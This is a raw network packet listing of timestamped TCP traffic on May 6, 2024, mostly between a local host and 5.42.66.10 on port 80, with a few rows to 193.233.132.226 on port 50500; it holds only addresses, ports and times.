May 6, 2024 07:53:04.268013954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268013954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268013954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268027067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268039942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268049955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268052101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268064022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268074036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268083096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268085957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268096924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268106937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268107891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268119097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268125057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268131971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268142939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268148899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268155098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268157005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268167973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268177986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268189907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268189907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268205881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268208981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268218040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268229008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268229961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268238068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268240929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268255949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268266916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268277884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268277884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268277884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268280029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268294096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268315077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268356085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268369913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268393993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268403053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268426895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268440962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268451929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268470049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268479109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268481016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268486023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268486023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268492937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268497944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268505096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268517017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268521070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268528938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268529892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268541098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268549919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268552065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268563032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268568993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268573999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268578053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268587112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268596888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268599987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268610954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268616915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268623114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268634081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268635988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268644094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268646955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268659115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268659115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268671036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.268681049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268686056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.268707991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.270376921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.270498037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.367060900 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:04.367223978 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:04.367233992 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:04.367244959 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:04.367285013 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:04.511581898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511595964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511606932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511671066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511682987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511694908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511696100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.511723042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511737108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511751890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.511770010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.511857986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511868954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511879921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511892080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511899948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.511904955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511915922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511926889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511928082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.511939049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511950970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511955023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.511962891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511970043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.511974096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511986017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.511997938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512001991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512011051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512023926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512028933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512042999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512068987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512110949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512124062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512134075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512145042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512152910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512156963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512171030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512181997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512185097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512192965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512204885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512206078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512217999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512228966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512231112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512242079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512242079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512254953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512267113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512274027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512284040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512295961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512300968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512307882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512317896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512320995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512346983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512372017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512401104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512412071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512423038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512434959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512437105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512445927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512459040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512485981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512495995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512507915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512520075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512530088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512533903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512620926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512633085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512643099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512645006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512655973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512656927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512669086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512680054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512686014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512691975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512702942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512715101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512717009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512727022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512741089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512744904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512753010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512764931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512764931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512777090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512784958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512789011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512799978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512803078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512811899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512826920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512833118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512844086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512855053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512860060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512866020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512876987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512888908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512892962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512900114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512912035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512922049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512923956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512936115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512945890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512948990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512962103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.512964964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.512988091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513005972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513008118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513019085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513030052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513042927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513050079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513067007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513067007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513088942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513092995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513101101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513112068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513118982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513134956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513140917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513148069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513158083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513171911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513199091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513216972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513227940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513238907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513250113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513251066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513263941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513278961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513293028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513304949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513309956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513315916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513324976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513336897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513349056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513353109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513360977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513381958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513400078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513448000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513458967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513470888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513482094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513484955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513494015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513504028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513504982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513519049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513530016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513534069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513542891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513554096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513556004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513566971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513576984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513580084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513592005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513596058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513605118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513612986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513616085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513643026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513657093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513667107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513669014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513680935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513691902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513693094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513704062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513715029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513715029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513727903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513739109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513741016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513763905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513780117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513822079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513835907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513842106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513853073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513864994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513875961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513876915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513889074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513901949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513911009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513921976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513922930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513935089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513946056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513953924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.513957977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513969898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.513983965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514003038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514038086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514050007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514060974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514072895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514072895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514086962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514097929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514101028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514110088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514127970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514130116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514143944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514151096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514157057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514167070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514168978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514182091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514192104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514194965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514204979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514215946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514225006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514228106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514240026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514245033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514251947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514262915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514264107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514296055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514314890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514327049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514336109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514348984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514353037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514359951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514369011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514372110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514384985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514396906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514398098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514408112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514420033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514426947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514431000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514444113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.514445066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.514456987 CEST	80	49741	5.42.66.10	192.168.2.4
